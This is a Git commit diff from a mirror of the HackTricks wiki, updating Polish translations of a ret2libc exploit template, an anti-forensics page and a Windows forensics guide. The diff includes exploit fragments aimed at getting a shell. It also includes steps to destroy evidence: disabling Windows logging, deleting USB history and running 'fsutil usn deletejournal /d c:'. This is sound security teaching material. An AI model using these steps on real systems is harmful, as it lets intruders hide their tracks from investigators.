Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 12:43:23 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['binary-exploitation/rop-return-oriented-programing/ret2lib/

Browse source
This commit is contained in:
Translator 2024-05-02 15:11:26 +00:00
parent 15dc60c3a1
commit 5dac011a5b
37 changed files with 926 additions and 894 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

14
binary-exploitation/rop-return-oriented-programing/ret2lib/rop-leaking-libc-address/rop-leaking-libc-template.md
View file

@ -10,11 +10,11 @@ Inne sposoby wsparcia HackTricks:
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -208,7 +208,7 @@ P.interactive() #Interact with your shell :)
### MAIN_PLT = elf.symbols\['main'] nie został znaleziony
Jeśli symbol "main" nie istnieje (prawdopodobnie dlatego, że jest to okrojony plik binarny), możesz po prostu znaleźć, gdzie znajduje się kod główny:
Jeśli symbol "main" nie istnieje (prawdopodobnie dlatego, że jest to okrojony plik binarny). W takim przypadku można po prostu znaleźć, gdzie znajduje się kod główny:
```python
objdump -d vuln_binary | grep "\.text"
Disassembly of section .text:
@ -220,17 +220,17 @@ MAIN_PLT = 0x401080
```
### Puts not found
Jeśli plik binarny nie używa funkcji Puts, powinieneś **sprawdzić, czy używa**
Jeśli plik binarny nie używa Puts, powinieneś **sprawdzić, czy używa**
### `sh: 1: %s%s%s%s%s%s%s%s: not found`
Jeśli po utworzeniu całego exploitu napotkasz ten **błąd**: `sh: 1: %s%s%s%s%s%s%s%s: not found`
Jeśli po utworzeniu **wszystkich** exploitów napotkasz ten **błąd**: `sh: 1: %s%s%s%s%s%s%s%s: not found`
Spróbuj **odjąć 64 bajty od adresu "/bin/sh"**:
```python
BINSH = next(libc.search("/bin/sh")) - 64
```
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -244,7 +244,7 @@ Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF** sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Kup [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**Grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) na githubie.
</details>

47
forensics/basic-forensic-methodology/anti-forensic-techniques.md
View file

@ -12,19 +12,19 @@ Inne sposoby wsparcia HackTricks:
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
# Znaczniki czasu
Atakujący może być zainteresowany **zmianą znaczników czasu plików**, aby uniknąć wykrycia.\
Atakujący może być zainteresowany **zmianą znaczników czasu plików** w celu uniknięcia wykrycia.\
Możliwe jest znalezienie znaczników czasu wewnątrz MFT w atrybutach `$STANDARD_INFORMATION` __ i __ `$FILE_NAME`.
Oba atrybuty mają 4 znaczniki czasu: **Modyfikację**, **dostęp**, **tworzenie** i **modyfikację rejestru MFT** (MACE lub MACB).
**Eksplorator Windowsa** i inne narzędzia pokazują informacje z **`$STANDARD_INFORMATION`**.
**Eksplorator Windows** i inne narzędzia pokazują informacje z **`$STANDARD_INFORMATION`**.
## TimeStomp - Narzędzie antyforensyczne
@ -65,21 +65,21 @@ Znaczniki czasu **NTFS** mają **precyzję** **100 nanosekund**. Znalezienie pli
## SetMace - Narzędzie antyforensyczne
To narzędzie może modyfikować oba atrybuty `$STARNDAR_INFORMATION` i `$FILE_NAME`. Jednakże, od Windows Vista, konieczne jest posiadanie działającego systemu operacyjnego na żywo, aby zmodyfikować te informacje.
To narzędzie może modyfikować oba atrybuty `$STARNDAR_INFORMATION` i `$FILE_NAME`. Jednakże, od Windows Vista, konieczne jest posiadanie działającego systemu operacyjnego w celu zmodyfikowania tych informacji.
# Ukrywanie danych
NTFS używa klastra i minimalnego rozmiaru informacji. Oznacza to, że jeśli plik zajmuje jeden klaster i pół, **pozostała połowa nigdy nie zostanie użyta** do momentu usunięcia pliku. Dlatego możliwe jest **ukrycie danych w tej przestrzeni luzem**.
NTFS używa klastra i minimalnego rozmiaru informacji. Oznacza to, że jeśli plik zajmuje jeden klaster i pół, **pozostała połowa nigdy nie zostanie użyta** do momentu usunięcia pliku. Dlatego możliwe jest **ukrycie danych w tej przestrzeni rezerwowej**.
Istnieją narzędzia takie jak slacker, które pozwalają na ukrywanie danych w tej "ukrytej" przestrzeni. Jednak analiza `$logfile` i `$usnjrnl` może pokazać, że dodano pewne dane:
![](<../../.gitbook/assets/image (452).png>)
Następnie możliwe jest odzyskanie przestrzeni luzem za pomocą narzędzi takich jak FTK Imager. Należy zauważyć, że tego rodzaju narzędzie może zapisać zawartość zasłoniętą lub nawet zaszyfrowaną.
Następnie możliwe jest odzyskanie przestrzeni rezerwowej za pomocą narzędzi takich jak FTK Imager. Należy zauważyć, że tego rodzaju narzędzie może zapisać zawartość zasłoniętą lub nawet zaszyfrowaną.
# UsbKill
To narzędzie **wyłączy komputer w przypadku wykrycia jakiejkolwiek zmiany w portach USB**.\
To narzędzie **wyłączy komputer, jeśli wykryta zostanie jakakolwiek zmiana w portach USB**.\
Sposobem na odkrycie tego byłoby sprawdzenie działających procesów i **przejrzenie każdego skryptu pythona działającego**.
# Dystrybucje Live Linux
@ -92,7 +92,7 @@ Te dystrybucje są **wykonywane w pamięci RAM**. Jedynym sposobem na ich wykryc
# Konfiguracja Windows
Możliwe jest wyłączenie kilku metod logowania w systemie Windows, aby utrudnić dochodzenie w sprawie forensyki.
Możliwe jest wyłączenie kilku metod logowania w systemie Windows, aby utrudnić dochodzenie w dziedzinie informatyki sądowej.
## Wyłączenie znaczników czasu - UserAssist
@ -105,7 +105,7 @@ Wyłączenie UserAssist wymaga dwóch kroków:
## Wyłączenie znaczników czasu - Prefetch
To zapisze informacje o aplikacjach uruchomionych w celu poprawy wydajności systemu Windows. Jednakże może to być również przydatne w praktykach forensycznych.
To zapisze informacje o aplikacjach uruchomionych w celu poprawy wydajności systemu Windows. Jednakże może to być również przydatne w praktykach związanych z informatyką sądową.
* Uruchom `regedit`
* Wybierz ścieżkę pliku `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters`
@ -113,20 +113,20 @@ To zapisze informacje o aplikacjach uruchomionych w celu poprawy wydajności sys
* Wybierz Modyfikuj dla każdego z nich, aby zmienić wartość z 1 (lub 3) na 0
* Zrestartuj
## Wyłączenie znaczników czasu - Czas ostatniego dostępu
## Wyłączenie znaczników czasu - Ostatni czas dostępu
Za każdym razem, gdy folder jest otwierany z woluminu NTFS na serwerze Windows NT, system zajmuje czas na **aktualizację pola znacznika czasu na każdym wymienionym folderze**, zwane czasem ostatniego dostępu. Na intensywnie używanym woluminie NTFS może to wpłynąć na wydajność.
Za każdym razem, gdy folder jest otwierany z woluminu NTFS na serwerze Windows NT, system zajmuje czas na **aktualizację pola znacznika czasu na każdym wymienionym folderze**, zwane ostatnim czasem dostępu. Na intensywnie używanym woluminie NTFS może to wpłynąć na wydajność.
1. Otwórz Edytor rejestru (Regedit.exe).
2. Przejdź do `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`.
3. Znajdź `NtfsDisableLastAccessUpdate`. Jeśli nie istnieje, dodaj tę wartość DWORD i ustaw jej wartość na 1, co wyłączy proces.
3. Znajdź `NtfsDisableLastAccessUpdate`. Jeśli nie istnieje, dodaj ten DWORD i ustaw jego wartość na 1, co wyłączy proces.
4. Zamknij Edytor rejestru i zrestartuj serwer.
## Usuń historię USB
Wszystkie **wpisy urządzeń USB** są przechowywane w rejestrze systemu Windows pod kluczem rejestru **USBSTOR**, który zawiera podklucze tworzone za każdym razem, gdy podłączysz urządzenie USB do komputera. Możesz znaleźć ten klucz tutaj `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Usunięcie tego** spowoduje usunięcie historii USB.\
Wszystkie **wpisy urządzeń USB** są przechowywane w rejestrze systemu Windows pod kluczem rejestru **USBSTOR**, który zawiera podklucze tworzone za każdym razem, gdy podłączysz urządzenie USB do komputera lub laptopa. Możesz znaleźć ten klucz tutaj `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Usunięcie tego** spowoduje usunięcie historii USB.\
Możesz także użyć narzędzia [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html), aby upewnić się, że je usunąłeś (i je usunąć).
Innym plikiem, który zapisuje informacje o urządzeniach USB, jest plik `setupapi.dev.log` znajdujący się w `C:\Windows\INF`. Również ten plik powinien zostać usunięty.
Innym plikiem, który zapisuje informacje o urządzeniach USB, jest plik `setupapi.dev.log` znajdujący się w `C:\Windows\INF`. Również powinien zostać usunięty.
## Wyłącz kopie migawkowe
@ -139,7 +139,7 @@ Aby wyłączyć kopie migawkowe [kroki stąd](https://support.waters.com/KB_Inf/
1. Otwórz program Usługi, wpisując "services" w pole wyszukiwania tekstu po kliknięciu przycisku start w systemie Windows.
2. Z listy znajdź "Kopię migawkową woluminu", wybierz ją, a następnie uzyskaj dostęp do właściwości, klikając prawym przyciskiem myszy.
3. Wybierz opcję Wyłączone z menu rozwijanego "Typ uruchamiania", a następnie potwierdź zmianę, klikając Zastosuj i OK.
3. Wybierz opcję Wyłączone z rozwijanego menu "Typ uruchamiania", a następnie potwierdź zmianę, klikając Zastosuj i OK.
Możliwe jest również zmodyfikowanie konfiguracji, które pliki zostaną skopiowane w kopii migawkowej w rejestrze `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot`
@ -164,6 +164,21 @@ Możliwe jest również zmodyfikowanie konfiguracji, które pliki zostaną skopi
* `fsutil usn deletejournal /d c:`
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
<details>
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLANY SUBSKRYPCYJNE**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

175
forensics/basic-forensic-methodology/windows-forensics/README.md
View file

@ -4,7 +4,7 @@
<details>
<summary><strong>Nauka hakowania AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Zacznij od zera i stań się ekspertem od hakowania AWS dzięki</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Inne sposoby wsparcia HackTricks:
@ -12,11 +12,11 @@ Inne sposoby wsparcia HackTricks:
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
@ -26,26 +26,26 @@ Inne sposoby wsparcia HackTricks:
W ścieżce `\Users\<nazwa_użytkownika>\AppData\Local\Microsoft\Windows\Notifications` znajduje się baza danych `appdb.dat` (przed rocznicą systemu Windows) lub `wpndatabase.db` (po rocznicy systemu Windows).
Wewnątrz tej bazy danych SQLite znajduje się tabela `Notification` z wszystkimi powiadomieniami (w formacie XML), które mogą zawierać interesujące dane.
Wewnątrz tej bazy danych SQLite znajdziesz tabelę `Notification` z wszystkimi powiadomieniami (w formacie XML), które mogą zawierać interesujące dane.
### Harmonogram
### Chronologia
Harmonogram to charakterystyka systemu Windows, która zapewnia **chronologiczną historię** odwiedzonych stron internetowych, edytowanych dokumentów i uruchomionych aplikacji.
Chronologia to charakterystyczna funkcja systemu Windows, która zapewnia **chronologiczną historię** odwiedzonych stron internetowych, edytowanych dokumentów i uruchomionych aplikacji.
Baza danych znajduje się w ścieżce `\Users\<nazwa_użytkownika>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. Tę bazę danych można otworzyć za pomocą narzędzia SQLite lub narzędzia [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd), **które generuje 2 pliki, które można otworzyć za pomocą narzędzia** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
Baza danych znajduje się w ścieżce `\Users\<nazwa_użytkownika>\AppData\Local\ConnectedDevicesPlatform\<id>\ActivitiesCache.db`. Można ją otworzyć za pomocą narzędzia SQLite lub narzędzia [**WxTCmd**](https://github.com/EricZimmerman/WxTCmd), **które generuje 2 pliki, które można otworzyć za pomocą narzędzia** [**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md).
### Strumienie danych alternatywnych (ADS)
Pliki pobrane mogą zawierać **strefę danych alternatywnych (ADS) Zone.Identifier**, wskazującą **sposób** pobrania pliku z sieci wewnętrznej, internetu itp. Niektóre oprogramowanie (np. przeglądarki) zazwyczaj dodają nawet **więcej** **informacji**, takich jak **adres URL**, z którego pobrano plik.
Pliki pobrane mogą zawierać **strefę danych alternatywnych (ADS) Zone.Identifier**, wskazującą **sposób** pobrania pliku z sieci wewnętrznej, internetu itp. Niektóre oprogramowanie (np. przeglądarki) zazwyczaj zawierają nawet **więcej** **informacji**, takich jak **adres URL**, z którego pobrano plik.
## **Kopie zapasowe plików**
### Kosz
W systemach Vista/Win7/Win8/Win10 **Kosz** znajduje się w folderze **`$Recycle.bin`** w głównym katalogu dysku (`C:\$Recycle.bin`).\
Po usunięciu pliku z tego folderu tworzone są 2 konkretne pliki:
Gdy plik jest usuwany z tego folderu, tworzone są 2 konkretne pliki:
* `$I{id}`: Informacje o pliku (data usunięcia}
* `$I{id}`: Informacje o pliku (data usunięcia)
* `$R{id}`: Zawartość pliku
![](<../../../.gitbook/assets/image (486).png>)
@ -56,7 +56,7 @@ Posiadając te pliki, można użyć narzędzia [**Rifiuti**](https://github.com/
```
![](<../../../.gitbook/assets/image (495) (1) (1) (1).png>)
### Kopie woluminu cieni
### Kopie migowe woluminów
Shadow Copy to technologia zawarta w systemie Microsoft Windows, która może tworzyć **kopie zapasowe** lub migawki plików lub woluminów komputerowych, nawet gdy są one w użyciu.
@ -64,7 +64,7 @@ Te kopie zapasowe zazwyczaj znajdują się w `\System Volume Information` z pozi
![](<../../../.gitbook/assets/image (520).png>)
Montując obraz forensyczny za pomocą **ArsenalImageMounter**, narzędzie [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) można użyć do sprawdzenia kopii cienia i nawet **wyodrębnienia plików** z kopii zapasowych cienia.
Montując obraz forensyczny za pomocą **ArsenalImageMounter**, narzędzie [**ShadowCopyView**](https://www.nirsoft.net/utils/shadow\_copy\_view.html) można użyć do zbadania kopii migowych i nawet **wyodrębnienia plików** z kopii zapasowych migawek.
![](<../../../.gitbook/assets/image (521).png>)
@ -89,13 +89,13 @@ System Windows **automatycznie** **tworzy** te **skróty** gdy użytkownik **otw
* Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\`
* Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\`
Gdy utworzony zostanie folder, tworzony jest również link do folderu, do folderu nadrzędnego i do folderu dziadka.
Gdy utworzony zostaje folder, tworzony jest również skrót do folderu, do folderu nadrzędnego oraz do folderu pradziadka.
Te automatycznie tworzone pliki linków **zawierają informacje o pochodzeniu** takie jak czy to **plik** **czy** folder, **czasy MAC** tego pliku, **informacje o woluminie**, gdzie plik jest przechowywany oraz **folder pliku docelowego**. Te informacje mogą być przydatne do odzyskania tych plików w przypadku ich usunięcia.
Te automatycznie tworzone pliki skrótów **zawierają informacje o pochodzeniu**, czy to jest **plik** **czy** **folder**, **czasy MAC** tego pliku, **informacje o woluminie**, gdzie znajduje się plik oraz **folder docelowy pliku**. Te informacje mogą być przydatne do odzyskania tych plików w przypadku ich usunięcia.
Ponadto **data utworzenia linku** to pierwszy **czas**, kiedy oryginalny plik został **pierwszy** **raz** **użyty**, a **data** **modyfikacji** linku to **ostatni** **czas**, kiedy plik źródłowy był używany.
Ponadto **data utworzenia skrótu** jest pierwszym **czasem**, kiedy oryginalny plik został **pierwszy** **raz** **użyty**, a **data** **modyfikacji** skrótu to **ostatni** **czas**, kiedy plik źródłowy był używany.
Aby sprawdzić te pliki, można użyć [**LinkParser**](http://4discovery.com/our-tools/).
Aby zbadać te pliki, można użyć [**LinkParser**](http://4discovery.com/our-tools/).
W tym narzędziu znajdziesz **2 zestawy** znaczników czasowych:
@ -108,27 +108,27 @@ W tym narzędziu znajdziesz **2 zestawy** znaczników czasowych:
2. LinkAccessDate
3. LinkCreationDate.
Pierwszy zestaw znaczników czasowych odnosi się do **znaczników czasowych samego pliku**. Drugi zestaw odnosi się do **znaczników czasowych połączonego pliku**.
Pierwszy zestaw znaczników czasowych odnosi się do **znaczników czasowych pliku**. Drugi zestaw odnosi się do **znaczników czasowych połączonego pliku**.
Możesz uzyskać te same informacje uruchamiając narzędzie wiersza poleceń systemu Windows: [**LECmd.exe**](https://github.com/EricZimmerman/LECmd)
```
LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs
```
### Listy skoków
### Jumplists
Są to ostatnie pliki wskazane dla każdej aplikacji. To lista **ostatnio używanych plików przez aplikację**, do której można uzyskać dostęp w każdej aplikacji. Mogą być tworzone **automatycznie lub niestandardowo**.
To są ostatnie pliki wskazane dla każdej aplikacji. To lista **ostatnio używanych plików przez aplikację**, do której można uzyskać dostęp w każdej aplikacji. Mogą być tworzone **automatycznie lub niestandardowo**.
Listy skoków tworzone automatycznie są przechowywane w `C:\Users\{nazwa_użytkownika}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Listy skoków są nazwane zgodnie z formatem `{id}.autmaticDestinations-ms`, gdzie początkowe ID to ID aplikacji.
**Jumplisty** tworzone automatycznie są przechowywane w `C:\Users\{nazwa_użytkownika}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`. Jumplisty są nazwane zgodnie z formatem `{id}.autmaticDestinations-ms`, gdzie początkowe ID to ID aplikacji.
Niestandardowe listy skoków są przechowywane w `C:\Users\{nazwa_użytkownika}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i są tworzone przez aplikację zazwyczaj dlatego, że coś **ważnego** wydarzyło się z plikiem (być może oznaczony jako ulubiony).
Niestandardowe jumplisty są przechowywane w `C:\Users\{nazwa_użytkownika}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\` i są tworzone przez aplikację zazwyczaj dlatego, że coś **ważnego** wydarzyło się z plikiem (być może oznaczony jako ulubiony).
**Czas utworzenia** dowolnej listy skoków wskazuje **pierwszy raz, gdy plik był otwierany**, a **czas modyfikacji ostatni raz**.
**Czas utworzenia** dowolnego jumplistu wskazuje **pierwszy raz, gdy plik był otwierany** oraz **czas modyfikacji ostatni raz**.
Możesz sprawdzić listy skoków za pomocą [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
Możesz sprawdzić jumplisty za pomocą [**JumplistExplorer**](https://ericzimmerman.github.io/#!index.md).
![](<../../../.gitbook/assets/image (474).png>)
(_Zauważ, że znaczniki czasowe dostarczone przez JumplistExplorer odnoszą się do samego pliku listy skoków_)
(_Zauważ, że znaczniki czasowe dostarczone przez JumplistExplorer odnoszą się do samego pliku jumplist_)
### Shellbags
@ -136,11 +136,11 @@ Możesz sprawdzić listy skoków za pomocą [**JumplistExplorer**](https://ericz
## Użycie urządzeń USB w systemie Windows
Możliwe jest zidentyfikowanie użycia urządzenia USB dzięki utworzeniu:
Możliwe jest zidentyfikowanie, że urządzenie USB zostało użyte dzięki utworzeniu:
* Folderu Ostatnie w systemie Windows
* Folderu Ostatnie w programie Microsoft Office
* Listów skoków
* Jumplistów
Zauważ, że niektóre pliki LNK zamiast wskazywać na oryginalną ścieżkę, wskazują na folder WPDNSE:
@ -154,19 +154,19 @@ Pliki w folderze WPDNSE są kopią oryginalnych plików, więc nie przetrwają r
### setupapi
Sprawdź plik `C:\Windows\inf\setupapi.dev.log`, aby uzyskać znaczniki czasu dotyczące momentu podłączenia urządzenia USB (szukaj `Section start`).
Sprawdź plik `C:\Windows\inf\setupapi.dev.log`, aby uzyskać znaczniki czasu dotyczące momentu, kiedy nastąpiło podłączenie urządzenia USB (szukaj `Section start`).
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
### Detektyw USB
[**USBDetective**](https://usbdetective.com) można użyć do uzyskania informacji o urządzeniach USB podłączonych do obrazu.
[**USBDetective**](https://usbdetective.com) można użyć do uzyskania informacji o urządzeniach USB, które były podłączone do obrazu.
![](<../../../.gitbook/assets/image (483).png>)
### Czyszczenie wtyczki i gry
Zaplanowane zadanie znane jako 'Czyszczenie wtyczki i gry' jest przeznaczone głównie do usuwania przestarzałych wersji sterowników. Wbrew określonym celom zachowania najnowszej wersji pakietu sterowników, źródła internetowe sugerują, że celuje również w sterowniki, które były nieaktywne przez 30 dni. W rezultacie sterowniki dla urządzeń wymiennych niepodłączonych w ciągu ostatnich 30 dni mogą zostać usunięte.
Zaplanowane zadanie znane jako 'Czyszczenie wtyczki i gry' jest przeznaczone głównie do usuwania przestarzałych wersji sterowników. Wbrew określonym celom zachowania najnowszej wersji pakietu sterowników, źródła internetowe sugerują, że celuje również w sterowniki, które były nieaktywne przez 30 dni. W rezultacie sterowniki dla urządzeń przenośnych, które nie były podłączone w ciągu ostatnich 30 dni, mogą zostać usunięte.
Zadanie znajduje się pod następującą ścieżką:
`C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`.
@ -176,12 +176,12 @@ Zamieszczono zrzut ekranu przedstawiający zawartość zadania:
**Kluczowe składniki i ustawienia zadania:**
- **pnpclean.dll**: Ta biblioteka DLL jest odpowiedzialna za rzeczywisty proces czyszczenia.
- **UseUnifiedSchedulingEngine**: Ustawione na `TRUE`, wskazujące na użycie ogólnego silnika harmonogramowania zadań.
- **UseUnifiedSchedulingEngine**: Ustawione na `TRUE`, co wskazuje na użycie ogólnego silnika harmonogramowania zadań.
- **MaintenanceSettings**:
- **Okres ('P1M')**: Nakazuje Harmonogramowi zadań uruchomienie zadania czyszczenia miesięcznie podczas regularnej konserwacji automatycznej.
- **Termin ('P2M')**: Instruuje Harmonogram zadań, że w przypadku dwóch kolejnych niepowodzeń zadania, należy wykonać zadanie podczas awaryjnej konserwacji automatycznej.
- **Okres ('P1M')**: Nakazuje Harmonogramowi zadań uruchomienie zadania czyszczenia co miesiąc podczas regularnego konserwacji automatycznej.
- **Termin ('P2M')**: Instruuje Harmonogram zadań, że w przypadku dwóch kolejnych niepowodzeń zadania, należy wykonać je podczas awaryjnej konserwacji automatycznej.
Ta konfiguracja zapewnia regularną konserwację i czyszczenie sterowników, z możliwością ponownej próby zadania w przypadku kolejnych niepowodzeń.
Ta konfiguracja zapewnia regularną konserwację i czyszczenie sterowników, z postanowieniami dotyczącymi ponownej próby wykonania zadania w przypadku kolejnych niepowodzeń.
**Aby uzyskać więcej informacji, sprawdź:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html)
@ -190,7 +190,7 @@ Ta konfiguracja zapewnia regularną konserwację i czyszczenie sterowników, z m
Emaile zawierają **2 interesujące części: Nagłówki i treść** wiadomości. W **nagłówkach** można znaleźć informacje takie jak:
* **Kto** wysłał emaile (adres email, IP, serwery poczty, które przekierowały email)
* **Kiedy** został wysłany email
* **Kiedy** email został wysłany
Ponadto, w nagłówkach `References` i `In-Reply-To` można znaleźć ID wiadomości:
@ -225,7 +225,7 @@ Możesz otworzyć plik PST za pomocą narzędzia [**Kernel PST Viewer**](https:/
![](<../../../.gitbook/assets/image (485).png>)
### Pliki OST programu Microsoft Outlook
Plik **OST** jest generowany przez program Microsoft Outlook, gdy jest skonfigurowany z serwerem **IMAP** lub **Exchange**, przechowując podobne informacje jak plik PST. Ten plik jest zsynchronizowany z serwerem, przechowując dane z **ostatnich 12 miesięcy** do **maksymalnego rozmiaru 50 GB**, i znajduje się w tym samym katalogu co plik PST. Aby wyświetlić plik OST, można skorzystać z [**przeglądarki Kernel OST**](https://www.nucleustechnologies.com/ost-viewer.html).
Plik **OST** jest generowany przez program Microsoft Outlook, gdy jest skonfigurowany z serwerem **IMAP** lub **Exchange**, przechowując podobne informacje jak plik PST. Ten plik jest zsynchronizowany z serwerem, przechowując dane z **ostatnich 12 miesięcy** do **maksymalnego rozmiaru 50 GB**, i znajduje się w tym samym katalogu co plik PST. Aby wyświetlić plik OST, można skorzystać z [**przeglądarki OST Kernel**](https://www.nucleustechnologies.com/ost-viewer.html).
### Odzyskiwanie załączników
